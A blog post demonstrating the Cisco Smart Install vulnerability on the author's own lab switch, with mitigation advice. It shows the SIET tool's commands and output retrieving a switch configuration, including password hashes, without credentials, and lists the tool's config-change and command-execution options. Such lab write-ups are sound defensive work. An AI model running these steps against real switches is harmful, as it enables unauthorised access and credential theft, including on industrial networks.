Here is an article from the guys that found the exploit https://embedi.org/blog/cisco-smart-install-remote-code-execution/. Their PoC code crashes the switch. As always, a crash is the first step in developing a usable exploit.
They list the following models as vulnerable:
- Catalyst 4500 Supervisor Engines
- Catalyst 3850 Series
- Catalyst 3750 Series
- Catalyst 3650 Series
- Catalyst 3560 Series
- Catalyst 2960 Series
- Catalyst 2975 Series
- IE 2000
- IE 3000
- IE 3010
- IE 4000
- IE 4010
- IE 5000
- SM-ES2 SKUs
- SM-ES3 SKUs
- NME-16ES-1G-P
- SM-X-ES3 SKUs
Notice it includes the Industrial Ethernet series. That's unfortunate given that those switches are likely to be in industrial plants and other locations where an attacker can do real physical damage.
My advice is to add "no vstack" to your deployment template unless you are actually using Smart Install. Also, as a Cisco best practice, the switch's management plane should be on a vlan that is only accessible to trusted users.
There is a working exploit available from this github repository - SIET.
As you can see in the exploit description, there are several things you can do:
-t test device for smart install.
-g get device config.
-c change device config.
-u update device IOS.
-e execute commands in the device's console.
-i ip address of target device
-l ip list of targets (file path)
--thread-count number of threads to be spawned
Let's exploit a switch
As always, do not run this on a switch you don't own or have explicit written permission to.Is vstack running?
The tool can quickly check->sudo python siet.py -t -i 192.168.10.52
[INFO]: Sending TCP packet to 192.168.10.52
[INFO]: Smart Install Client feature active on 192.168.10.52
[INFO]: 192.168.10.52 is affected
If you are logged into a switch there are a couple quick ways to verify
3750x#sh tcp brief all
TCB Local Address Foreign Address (state)
078C6E60 192.168.10.52.22 192.168.10.183.50902 ESTAB
07B162A8 *.4786 *.* LISTEN
06FA06BC *.443 *.* LISTEN
06F9FCFC *.443 *.* LISTEN
06F9F33C *.80 *.* LISTEN
06F9E97C *.80 *.* LISTEN
Having port 4786 open means Smart Install is running.
or
3750x#sh vstack config
Role: Client (SmartInstall enabled)
Vstack Director IP address: 0.0.0.0
*** Following configurations will be effective only on director ***
Vstack default management vlan: 1
Vstack start-up management vlan: 1
Vstack management Vlans: none
Join Window Details:
Window: Open (default)
Operation Mode: auto (default)
Vstack Backup Details:
Mode: On (default)
Repository:
Note that is says "Vstack default management vlan: 1" but I am successfully attacking on vlan 10.
So Smart Install is running on a 3750-x in my lab. The switch is running c3750e-universalk9-mz.150-2.SE10. I started out with c3750e-universalk9-tar.152-4.E7 but the switch would reload when I ran the tool with Smart Install enabled. Once I installed c3750e-universalk9-mz.150-2.SE10 I was able to download the full configuration without any credentials or SNMP RW string.
NOTE: The tool uses its own python tftp server so it will fail if you already have a tftp server running. In my case I had just uploaded the 15.2.SE10 firmware and the tftp server was running. It took me a minute to figure out why the tool was failing:
[INFO]: binding socket .. error: [Errno 98] Address already in use
First, let's see who's logged into the switch
3750x#who
Line User Host(s) Idle Location
* 1 vty 0 mhubbard idle 00:00:00 192.168.10.183
What type of authentication is in use
3750x#sh run | sec aaa
aaa new-model
aaa group server radius ISE-group
server name ISE
!
3750x#test aaa group ISE-group mhubbard ************** new-code
User successfully authenticated
USER ATTRIBUTES
service-type 0 7 [NAS Prompt]
Framed-Protocol 0 1 [PPP]
service-type 0 2 [Framed]
priv-lvl 0 15 (0xF)
So the switch is using RADIUS authentication and is connected to the RADIUS Server. I know that for sure because my account password had expired and I had to log into my Windows server and change it before I could log into the switch!
Download the configuration without any credentials
Run the Smart Install Exploitation Tool with the "-g" flag to download the configuration:
~/Dropbox/03_Tools/SIET$
->sudo python siet.py -g -i 192.168.10.52
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: Sending TCP packet to 192.168.10.52
[INFO]: Package send success to 192.168.10.52:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
[INFO]: connect from 192.168.10.52 58422
[INFO]:[192.168.10.52] puting file 192.168.10.52.conf octet
[INFO]:[192.168.10.52]:[put] success binding data port 44000
[INFO]:[192.168.10.52]:[put] file tftp/192.168.10.52.conf finish download, size: 14351
Show the file in SIET's tftp folder
mhubbard@1S1K-G5-5587:~/Dropbox/03_Tools/SIET/tftp$
->ls -l
total 20
-rw-r--r-- 1 root root 14351 May 19 21:53 192.168.10.52.conf
-rw-r--r-- 1 root root 51 Mar 5 14:33 execute.txt
Display the configuration that was downloaded
cat 192.168.10.52.conf
!
! No configuration change since last restart
!
version 15.0
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
service password-encryption
!
hostname 3750x
!
boot-start-marker
boot-end-marker
!
!
enable secret 5 $1$Ew15$ZstYXs4B38G/T710NavOV1
!
username cisco privilege 15 secret 5 $1$llTp$rNcLr9Y7GkG/zVmOdHNVR1
username hubbard privilege 15 secret 5 $1$5WVT$zWpFHuH2/FdDcQlOOchfS1
aaa new-model
!
!
aaa group server radius ISE-group
server name ISE
!
Conclusion
Cisco Smart Install is very useful if you support remote sites without IT staff but you must be aware of this vulnerability. If you use the Cisco best practice of ACLing the management plane to only a trusted network you are probably not at much risk until you upgrade.
Speaking of Cisco best practices, the guys that wrote SIET also write a fantastic tool called the Cisco Configuration Analysis Tool (CCAT). It takes your switch config and runs it against the "Hardening Cisco IOS Devices" document and shows all the best practices that you are running and more importantly, any that you are missing.
You can check out the CCAT here
sudo python siet.py -t -i 192.168.10.52
ReplyDeletestucks at
sudo python siet.py -t -i 192.168.10.52
sorry, at -
ReplyDeleteInfo: binding socket . . ok